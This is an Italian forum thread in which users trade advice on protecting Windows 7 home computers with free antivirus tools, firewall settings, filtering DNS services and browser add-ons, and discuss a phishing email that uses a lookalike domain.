Dico questo perchè utlimamente sono stato sotto attacco, quindi avendo la sfortuna di trovare qualche attaccante che sa il fatto suo i Norton DNS gli fanno un baffo (così come qualunque configurazione di sicurezza)...:

c'è dell'altro: LastPass > credo sia stato bypassato :eek: (ho anche inviato una segnalazione alla casa produttrice del software)
KeePass portable > non bypassato (almeno per ora...staremo a vedere )

visto che era sprecato comprare una licenza di 7 che tra qualche mese sarebbe andato in pensione
No, W7 andrà in pensione nel gennaio 2020 :asd:

post sbagliato

Ciao a tutti :D

spero che questo sia il thread giusto, altrimenti mi scuso e spero possiate indicarmi dove postare la mia domanda. Mi scade tra pochi giorni la "protezione" McAfee per il pc (AV+firewall: il firewall di Windows è stato disattivato da McAfee) e non ho alcuna intenzione di pagare 60 euro per rinnovarla, per cui mi indirizzerei volentieri verso un AV free: leggendo queste pagine e altre sul forum è chiaro che ce ne sono di buoni.

Il pc è nuovo (i5, 4GB RAM DD3 etc.), il SO è Windows 7 Home edition e come browser uso IE (ma potrei passare a Firefox). Non ho pretese particolari, navigo in maniera abbastanza sicura, perlopiù in siti affidabili, e uso poca posta elettronica (e sicura), però qualche volta McAfee ha rilevato dei trojan nel pc. Ad ogni modo, non ho mai avuto danni o rallentamenti sospetti e oggi, sempre secondo McAfee, il pc è pulito (ma devo fidarmi?)...
A vostro parere quale configurazione mi "conviene"? Avira e Avast nelle versioni free non hanno firewall: dovrei mettere uno di questi e tenermi il firewall di Windows, oppure prendere un firewall specifico? La Suite di Comodo ha tutto free (AV+anti-malware+firewall e altro ancora), ma ho letto che il suo firewall è roba per utenti esperti, cioè che ne hanno davvero bisogno, mentre l'AV è scarso...tenete comunque presente che me la sono cavata decentemente anche con McAfee che pure è notoriamente pesante e poco efficace (secondo le statistiche, postate anche qui, il firewall è come se non ci fosse, l'AV poco meglio).

Ultima cosa: ma ho davvero bisogno di quelle altre cose di cui parlava Polonio in apertura del thread? Prevx 3.0 free? uno scan on-demand? non rallentano il sistema, tutte queste cose insieme?

Mi scuso per la lunghezza, grazie per l'aiuto e buona serata a tutti! :D

Chiedo scusa...ho scritto pc ma intendevo notebook :doh:

Mi scade tra pochi giorni la "protezione" McAfee per il pc ...e non ho alcuna intenzione di pagare 60 euro per rinnovarla, per cui mi indirizzerei volentieri verso un AV free:...
è la tua botta di culo, per cui ne approfitti per cestinarlo :read: ...

Non ho pretese particolari, navigo in maniera abbastanza sicura, perlopiù in siti affidabili, e uso poca posta elettronica...
A vostro parere quale configurazione mi "conviene"? Avira e Avast nelle versioni free non hanno firewall...
Alla luce delle tue abitudini di navigazione direi che puoi scegliere pure a piacere (probabilmente punterei più su Avast)...

Ultima cosa: ma ho davvero bisogno di quelle altre cose di cui parlava Polonio in apertura del thread? Prevx 3.0 free? uno scan on-demand? non rallentano il sistema, tutte queste cose insieme?
in realtà, proprio tutte non occorrono...

In aggiunta alla configurazione di cui sopra, HitmanPro o Prevx free e stai ragionevolmente tranquillo senza appesantire nulla...

è la tua botta di culo, per cui ne approfitti per cestinarlo :read: ...


Alla luce delle tue abitudini di navigazione direi che puoi scegliere pure a piacere (probabilmente punterei più su Avast)...


in realtà, proprio tutte non occorrono...

In aggiunta alla configurazione di cui sopra, HitmanPro o Prevx free e stai ragionevolmente tranquillo senza appesantire nulla...

Perdonami Enne ma e' da un bel po che ho tolto via prevx dalla mia configurazione: non mi sembra piu' tanto supportato. . . quindi non lo tengo in considerazione.
Al suo posto ho messo hitman e ne sono soddisfatto anche se non ha un controllo in real time.

Per tornare alla domanda di west Wind, questo il mio parere:
- un browser ottimamente configurato (qui il thread (http://www.hwupgrade.it/forum/showthread.php?t=1955648/))
- dns alternativi (qui il topic (http://www.hwupgrade.it/forum/showthread.php?t=2222649))
- l'immancabile sandboxie (http://www.hwupgrade.it/forum/showthread.php?t=1570797)
- per firewall terrei quello di seven con l'aggiunta di windows 7 firewall control (http://www.sphinx-soft.com/Vista/index.html) per un approccio piu' diretto con questo strumento
- UAC al massimo

P.s.
Per l'antivirus non chiedetemelo perche' la risposta sarebbe scontata (http://www.hwupgrade.it/forum/showthread.php?t=2173386) :fiufiu: :asd:

Al momento mi fermerei qui.
Per un ragguaglio maggiore, vedasi la mia configurazione in firma :)

- per firewall terrei quello di seven con l'aggiunta di windows 7 firewall control (http://www.sphinx-soft.com/Vista/index.html)
per un approccio piu' diretto con questo strumento
- UAC al massimo
a proposito di Windows 7 Firewall Control Free
Kohai http://s13.postimage.org/5d8lp739f/image.gif (http://postimage.org/)
hai aggiornato Windows 7 Firewall Control Free alla 5.0.0.15
http://www.sphinx-soft.com/Vista/order.html
compatibile con WIN8
se lo fai mi avvisi ;)
grazie:)
http://s8.postimage.org/oue9bb0r5/Screen00410.jpg (http://postimage.org/image/oue9bb0r5/)

Windows 8,
Windows 7, Vista
(32/64-bit,Vista SP 1,2; Windows 7 SP1)
Windows Server 2008
(32/64-bit,R2,SP1)

Grazie a Enne e a Kohai per l'aiuto.

Consultando un po' meglio il forum sono giunto a queste conclusioni:

-Firefox al posto di IE9;
-Uno fra Avira e Avast (ho ancora un po' di giorni per scegliere);
-Firewall di Windows7 con il firewall control;
-Malwarebytes;
-Superantispyware (uso una connessione a tempo, per cui ho letto che Prevx e altre cose del genere sarebbero perfettamente inutili nel mio caso);

Può bastare? Gli ultimi due li ho già installati e mi sembrano buoni (il secondo mi ha trovato parecchi tracking cookies che erano sfuggiti a McAfee e allo stesso Malwarebytes!).

Solo un'ultima domanda, spero di non essere troppo OT: ho installato Firefox, l'ho messo browser predefinito. Ho anche seguito le indicazioni del thread ufficiale per velocizzarlo, ma niente da fare: sia in config. predefinita sia personalizzata è terribilmente più lento di IE9. Come diamine è possibile, visto che TUTTI dicono che è molto più veloce??

Grazie mille per l'aiuto! :)

Grazie a Enne e a Kohai per l'aiuto.

Consultando un po' meglio il forum sono giunto a queste conclusioni:

-Firefox al posto di IE9;
-Uno fra Avira e Avast (ho ancora un po' di giorni per scegliere);
-Firewall di Windows7 con il firewall control;
-Malwarebytes;
-Superantispyware (uso una connessione a tempo, per cui ho letto che Prevx e altre cose del genere sarebbero perfettamente inutili nel mio caso);

Può bastare? Gli ultimi due li ho già installati e mi sembrano buoni (il secondo mi ha trovato parecchi tracking cookies che erano sfuggiti a McAfee e allo stesso Malwarebytes!).

Solo un'ultima domanda, spero di non essere troppo OT: ho installato Firefox, l'ho messo browser predefinito. Ho anche seguito le indicazioni del thread ufficiale per velocizzarlo, ma niente da fare: sia in config. predefinita sia personalizzata è terribilmente più lento di IE9. Come diamine è possibile, visto che TUTTI dicono che è molto più veloce??

Grazie mille per l'aiuto! :)

toglierei superantispy e metterei hitmanpro
aggiungerei dsn norton
se non ti trovi con fireox,puoi continuare ad utilizzare ie a patto che quando navighi su siti non conosciuti adotti la sandbox ie;)

-Superantispyware (uso una connessione a tempo, per cui ho letto che Prevx e altre cose del genere sarebbero perfettamente inutili nel mio caso);

Può bastare? Gli ultimi due li ho già installati e mi sembrano buoni (il secondo mi ha trovato parecchi tracking cookies che erano sfuggiti a McAfee e allo stesso Malwarebytes!).
Io SAS lo toglierei, non mi è mai parso granchè.
Tieni conto che i tracking cookies sono una stupidata, anche perchè trovarli a posteriori non serve a nulla(tanto ormai il loro lo hanno già fatto).
La cosa migliore è impostare il browser in modo da non accettare i cookies di terze parti e abilitarne la cancellazione automatica alla chiusura del browser.
Fine dei tracking cookies.

Poi se lo tieni on demand puoi tenerlo pure ;)

a proposito di Windows 7 Firewall Control Free
Kohai http://s13.postimage.org/5d8lp739f/image.gif (http://postimage.org/)
hai aggiornato Windows 7 Firewall Control Free alla 5.0.0.15
http://www.sphinx-soft.com/Vista/order.html
compatibile con WIN8
se lo fai mi avvisi ;)
grazie:)
http://s8.postimage.org/oue9bb0r5/Screen00410.jpg (http://postimage.org/image/oue9bb0r5/)

Ciao Marco, e' sempre un piacere leggerti.
Proprio l'altro giorno stavo vedendo di aggiornare qualcosina sul notebook che accendo raramente, ma poi son stato preso per installare una stampante in modalita' ethernet e non ci ho fatto piu' caso.
Comunque se l'aggiornamento riguarda principalmente la compatibilita' a win 8, al momento posso aspettare ;)

Ciaoooo :)

Quoto Marco e Arny, SAS puoi toglierlo senza timori, al massimo utilizza la sua scansione online (http://www.superantispyware.com/onlinescan.html), ma adottando una connessione con chiavetta, non farei nemmeno quel controllo.

Per firefox, installa questi addons:
- noscript
- adblock plus
- fasterfox lite (settandolo a caricamento turbo)

A parte nel pc, mettici anche speedyfox (http://www.crystalidea.com/speedyfox)

OT
Naturalmente, utilizza anche deframmentazione e ccleaner ogni tot di tempo
End OT

Ciao Marco, e' sempre un piacere leggerti.
Comunque se l'aggiornamento
riguarda principalmente la compatibilità' a win 8,
al momento posso aspettare ;)
Ciaoooo :)
ehhh è la stessa cosa che ho pensato pure io
vedrò se mi capita per le mani un Win7 64 bit gli metto il nuovo;)
Windows 7 Firewall Control Free 5.0.0.15
ciao :)

Chiedo lumi a chi capisce più di me :)

Sto provando Windows 7 Firewall Control Free, quando appare questa finestra, fine procedura installazione, cosa consigliate? Il mio istinto dice di deselezionare la prima voce :D

http://t.imgbox.com/adjF3ld6.jpg (http://imgbox.com/adjF3ld6)

Buonasera a tutti,
a breve dovrò comprare un antivirus per il mio portatile (ha 3 mesi di vita, quindi abbastanza recente e performante). Con il pc oltre all'utilizzo classico di navigazione ecc, faccio acquisti on-line tramite carta di credito, e home banking, quindi vorrei stare tranquillo (per questo preferisco optare per qualcosa a pagamento piuttosto che free).

Cosa mi consigliate?
Sono indeciso tra Panda Antivirus2012, Kaspersky Internet Security 2012 (abbastanza costoso), NOD32 ANTIVIRUS (molto costoso) oppure il classico Norton Internet Security 2012 (troppo costoso).

Che cosa mi consigliate Voi che siete super esperti? :(

Chiedo lumi a chi capisce più di me :)
Sto provando Windows 7 Firewall Control Free, quando appare questa finestra, fine procedura installazione, cosa consigliate? Il mio istinto dice di deselezionare la prima voce :D
credo sia un'impostazione del nuovo v. 5.0.0.15
non ricordo ci fosse nella mia v. 4.1.21.93
purtroppo non so' aiutarti essendo eng Off non capisco cosa chiede
aspettiamo qualche eng ON ;)
le uniche impostazione che ci sono "nel mio" sono
http://s11.postimage.org/f5z0q2hin/Screen00413.jpg (http://postimage.org/image/f5z0q2hin/)
ciao

Un metodo poco conosciuto per difendersi dai malware consiste nell'abilitare SEHOP su Windows Vista e 7, acronimo di Structured Exception Handler
Overwrite Protection, che è abilitato di default solo su Windows Server 2008. SEHOP si occupa di verificare in real-time quando viene a
verificarsi un'eccezione nell'esecuzione dei programmi.
Quindi quando un malware tenta di acquisire privilegi più elevati, tentando di sovrascrivere la cosiddetta catena "SEH", SEHOP blocca
l'infezione sul nascere. Non si tratta di una difesa al 100% ma aiuta a tenere "pulito" il s.o.
Credo che il principio sia simile ad EMET, programma di sicurezza molto valido che ho disinstallato in quanto mi dava problemi con i driver
della stampante.

credo sia un'impostazione del nuovo v. 5.0.0.15
non ricordo ci fosse nella mia v. 4.1.21.93
purtroppo non so' aiutarti essendo eng Off non capisco cosa chiede
aspettiamo qualche eng ON ;)
le uniche impostazione che ci sono "nel mio" sono
http://s11.postimage.org/f5z0q2hin/Screen00413.jpg (http://postimage.org/image/f5z0q2hin/)
ciao

Grazie comunque :)

Credo che il principio sia simile ad EMET, programma di sicurezza molto valido che ho disinstallato in quanto mi dava problemi con i driver
della stampante.
Non è che il principio è simile, è proprio uguale. :D
Tra le protezioni di emet infatti c'è anche l'abilitazione del sehop sia a livello di so e/o di singole applicazioni.

Se avevi programmi con emet puoi impostare il dep su opt-in invece che su always on, la stragrande maggioranza delle volte si risolve così (se dovesse interessarti riprovarlo).

ehhh è la stessa cosa che ho pensato pure io
vedrò se mi capita per le mani un Win7 64 bit gli metto il nuovo;)
Windows 7 Firewall Control Free 5.0.0.15
ciao :)

Ciuao caro (la u e' stata volontaria) :vicini: :)

Chiedo lumi a chi capisce più di me :)

Sto provando Windows 7 Firewall Control Free, quando appare questa finestra, fine procedura installazione, cosa consigliate? Il mio istinto dice di deselezionare la prima voce :D

http://t.imgbox.com/adjF3ld6.jpg (http://imgbox.com/adjF3ld6)

Di default le scelte sarebbero queste?
Io comunque deselezionerei la prima voce; anche se c'e' il firewall a sovraintendere il tutto, preferisco star sicuro e NON abilitare l'accesso ed il controllo da remoto, a meno che non sia strettamente necessario :stordita:
Oltre all'accesso da remoto, verrebbe anche abilitata la condivisione dei files. . . naaaa :nonsifa: :fuck: :ciapet:

potrebbe valer la pena inserire i dns free di comodo o norton per avere una protezione antipishing e antimalware sul pc di casa?
siccome il pc verrebbe usato per home banking, basterebbero i dns free, avg free e zonealarm free per stare al sicuro?

No, W7 andrà in pensione nel gennaio 2020 :asd:

Da questa tua affermazione mi sembra di aver capito che il supporto a Windows 7, compresi gli aggiornamenti per la sicurezza, durerà fino al 2020.

Secondo me nel 2020 anche Windows 8 sarà andato in pensione :p, e ci sarà Windows 9...

Chiedo lumi a chi capisce più di me :)

Sto provando Windows 7 Firewall Control Free, quando appare questa finestra, fine procedura installazione, cosa consigliate? Il mio istinto dice di deselezionare la prima voce :D

http://t.imgbox.com/adjF3ld6.jpg (http://imgbox.com/adjF3ld6)

Siceramente deselezionando la prima voce hai più sicurezza, io, invece, l'ho selezionata in quanto condivido altri pc in rete domestica ed utilizzo il DLNA con lo smartphone ed il Televisore. Ho provato con la prima installazione a deselezionarlo ma Serviio non mi condivideva il TV. Comunque c'è sempre il firewall a monte di tutto, basta stare all'occhio.
Parlo non da esperto ma da utilizzatore principiante (l'ho installato stamane).

Chiedo lumi a chi capisce più di me :)
Sto provando Windows 7 Firewall Control Free, quando appare questa finestra, fine procedura installazione, cosa consigliate? Il mio istinto dice di deselezionare la prima voce :D
http://t.imgbox.com/adjF3ld6.jpg (http://imgbox.com/adjF3ld6)
Sinceramente deselezionando la prima voce hai più sicurezza, io, invece, l'ho selezionata in quanto condivido altri pc in rete domestica ed utilizzo il DLNA con lo smartphone ed il Televisore. Ho provato con la prima installazione a deselezionarlo ma Serviio non mi condivideva il TV. Comunque c'è sempre il firewall a monte di tutto, basta stare all'occhio.
Parlo non da esperto ma da utilizzatore principiante (l'ho installato stamane).
grazie per il Feedback
se andrò' ad aggiornare in sovrascrittura il mio v.4....
lascio/metterò selezione alla prima voce
in quanto abbiamo altri Pc in rete + stampante di rete
e non vorrei avere problemi a stampare i documenti
tanto adesso nella v.4.... non c'è ;)
ciao

potrebbe valer la pena inserire i dns free di comodo o norton per avere una protezione antipishing e antimalware sul pc di casa?
siccome il pc verrebbe usato per home banking, basterebbero i dns free, avg free e zonealarm free per stare al sicuro?

Se vuoi impostare quei DNS per avere una maggiore sicurezza ben venga, quindi va bene, è sempre "qualcosina", ma come ben saprete non bisogna mai affidarsi troppo a certe soluzioni...non vorrei fare il moralista della situazione ma come ben saprete la migliore protezione resta sempre l'attenzione e la prudenza di chi sta davanti al monitor...

*Io ad esempio rimango dell'idea che sia inutile impostare DNS alternativi, infatti non ne ho mai usati (li ho usati solo per brevi periodi di tempo). Ho sempre usato i DNS predefiniti del mio ISP (Alice) che tra l'altro mi sembrano più veloci rispetto ai Norton DNS, OpenDNS, etc...
e poi se devo dire la mia non mi fido nemmeno dei DNS alternativi, ho come l'impressione che ci siano problemini alla privacy...

Di default le scelte sarebbero queste?
Io comunque deselezionerei la prima voce; anche se c'e' il firewall a sovraintendere il tutto, preferisco star sicuro e NON abilitare l'accesso ed il controllo da remoto, a meno che non sia strettamente necessario :stordita:
Oltre all'accesso da remoto, verrebbe anche abilitata la condivisione dei files. . . naaaa :nonsifa: :fuck: :ciapet:

Così ho fatto, adesso però devo selezionare l'utente all'avvio, sono un garibaldino amministratore senza account limitato. :mbe:

Una cosa che mi da fastidio è la finestra di registrazione che appare spesso, ho letto nelle FAQ che è per la versione plus...ma io ho la free :muro:

Così ho fatto, adesso però devo selezionare l'utente all'avvio, sono un garibaldino amministratore senza account limitato.
cavolo allora forse meglio mettere spunta


Una cosa che mi da fastidio è la finestra di registrazione che appare spesso,
ho letto nelle FAQ che è per la versione plus...ma io ho la free
accc... che strano nella v.4... free mai visto 1
ci fai sapere se riesci a risolvere ed eliminare il rompimento
perché a sto punto mi sa che rimango con la v4.... che va' bene e senza problemi
nel caso ci siano interessati con Win7 64 bit
posso uppare l'exe della mia 4.1.21.93 free che è ok
lasciamo agli Win8 la v.5 ;)
ciao

@gyonny
usero' il tuo consiglio perche' la penso come te.
uso quelli di alice e siteadvisor free.
pensa che avendo i dns antimalware mi sono preso 3 virus solo aprendo una pagina web di una ricerca fatta con goole.
non avevo ancora site advisor installato. grazie.

Voglio far vedere in pubblico una mail di spam che ho ricevuto un paio di volte:

http://i46.tinypic.com/302cr2w.jpg

Come potrete ben notare si vede anche ad occhi chiusi che si tratta di spam, 1°) perchè le banche o poste che siano non inviano mai questo tipo di mail in cui chiedono la verifica dei dati dell'account; 2°) perchè si vede benissimo che il nome del sito è stato modificato > p0ste, ovvero c'è uno zero al posto della lettera o...

E sono convinto che in questi casi chi abbocca non potrà di certo sperare che DNS alternativi gli rivelino un eventuale sito di phishing ove inseriranno eventuali credenziali di accesso.
Per questo dicevo che la migliore prevenzione sta nell'attenzione e la prudenza di chi sta dietro ad un monitor...

A parte questo credo proprio che chiunque avrebbe intutito che questo è spam...e non dico che "solo uno stupido" non l'avrebbe capito perchè secondo me nel 2012 non esistono più gli stupidi, semmai è più corretto dire che qualcuno "più distratto" sarebbe abboccato.

anche a me arrivano queste mail.
qualche distratto potrebbe cascarci per questo affermo che forse il lettore delle poste e' il migliore perche' non ha i codici in chiaro da ricopiare e inserire.
io volevo i dns antipishing non per me ma per inserirli nel router.

E sono convinto che in questi casi chi abbocca non potrà di certo sperare che DNS alternativi gli rivelino un eventuale sito di phishing ove inseriranno eventuali credenziali di accesso.


TI SBAGLI I NORTON DSN BLOCCANO QUEL SITO
;)

io avevo i dns norton e con una ricerca di google solo aprendo un sito ho preso 3 virus. forse il database non era aggiornato sui malware.
se fossi sicuro che i dns norton funzionano li rimetto almeno per il pishing li rimetto.

anche a me arrivano queste mail.
qualche distratto potrebbe cascarci per questo affermo che forse il lettore delle poste e' il migliore perche' non ha i codici in chiaro da ricopiare e inserire.
io volevo i dns antipishing non per me ma per inserirli nel router.

il problema è che i domini cambiano in continuazione ,quindi puoi avere il miglior antivirus i migliori dsn,se il dominio e' fresco fresco,non rivelano nulla...
in questo caso un po' di sale nella zucca e' la miglior ricetta;)

io avevo i dns norton e con una ricerca di google solo aprendo un sito ho preso 3 virus. forse il database non era aggiornato sui malware.
se fossi sicuro che i dns norton funzionano li rimetto almeno per il pishing li rimetto.

ti ho risposto sopra,per gli zero day c'e' poco da fare...i norton dsn sono una prima barriera...

poi ovviamente bisogna avere altro per difendersi dalle minacce

ora mi e' chiaro.
e' un qualcosa che fa sempre bene.
ottimi i dns norton free in 3 versioni, che bloccano anche i siti per adulti.

ora mi e' chiaro.
e' un qualcosa che fa sempre bene.
ottimi i dns norton free in 3 versioni, che bloccano anche i siti per adulti.

infatti io li ho impostati sui pc e non sul router
preferendo sul pc dei miei bimbi proprio quelli che bloccano i contenuti vietati e violenti,con account limitato solo per loro;)

infatti io li ho impostati sui pc e non sul router
preferendo sul pc dei miei bimbi proprio quelli che bloccano i contenuti vietati e violenti,con account limitato solo per loro;)
io ho settato quelli che finiscono con il numero 50 per i bimbi solo sul pc del piccolo e con account user.

io ho settato quelli che finiscono con il numero 50 per i bimbi solo sul pc del piccolo e con account user.

per i bimbi con 60 finale filtra anche il contenuto violento

si e blocca anche facebook. :)

si e blocca anche facebook. :)

per i bimbi facebook dovrebbe essere vietato;)

esatto :)

esatto :)

non lo blocca...accedo anche con i 60....

se lo vuoi bloccare modifica il file host

TI SBAGLI I NORTON DSN BLOCCANO QUEL SITO
;)

Questa è una buona notizia.
Avevo anche aperto l'allegato di quella mail di spam su una macchina virtuale per vedere cosa c'era dentro, ma non c'era nulla...forse la mail era già stata pulita dall'antivirus presente nei server di posta elttronica Yahoo e quindi spostata direttamente sulla mia casella Antispam.

con il 60 facebook funziona.

con il 60 facebook funziona.

Scusami ma non ho capito...potresti essere più specifico?:p Grazie

PS. Premetto anche che non sono iscritto a Facebook, ho cancellato il mio profilo nel 2008

con il 60 facebook funziona.
con i dns di norton facebook funziona.